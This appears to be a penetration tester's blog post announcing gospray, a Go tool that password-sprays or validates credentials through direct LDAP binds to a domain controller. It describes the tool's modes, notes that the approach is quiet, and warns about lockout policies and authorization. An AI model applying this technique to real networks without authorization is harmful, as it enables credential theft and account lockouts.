On a network and need credentials? Try password spraying the domain controller directly.
A few years ago, I wrote this password spray tool called
gospray that was used succesfully in a couple of engagements since. It does an LDAP bind directly against the domain controller to validate credentials. This doesn’t require an SMB server (or other servers) as target. So, it’s pretty quiet and number of concurrent Go routines is configurable. :)
Check it out on Github: GoSpray
High Level Features
At a high level the latest version supports two testing modes:
- Password Spray: If both
-passwordscommand line arguments are specified, then a spray will be performed.
- Password Validation Mode: providing the
-validatecredscommand line option is for validation. The file specified with
validatecredsis parsed line by line, each line is split by colon (:) to retrieve
username:password. Afterwards an authentication attempt will be performed against specified domain controller.
By default it waits 10 seconds after a round (per horizontal password round) - but you might want to adjust that depending on the number of accounts, users and lockout policies.
Note: Be careful about account lockout policies (know what you do!) and make sure you have authorization from appropriate stakeholders before engaging in this kind of testing.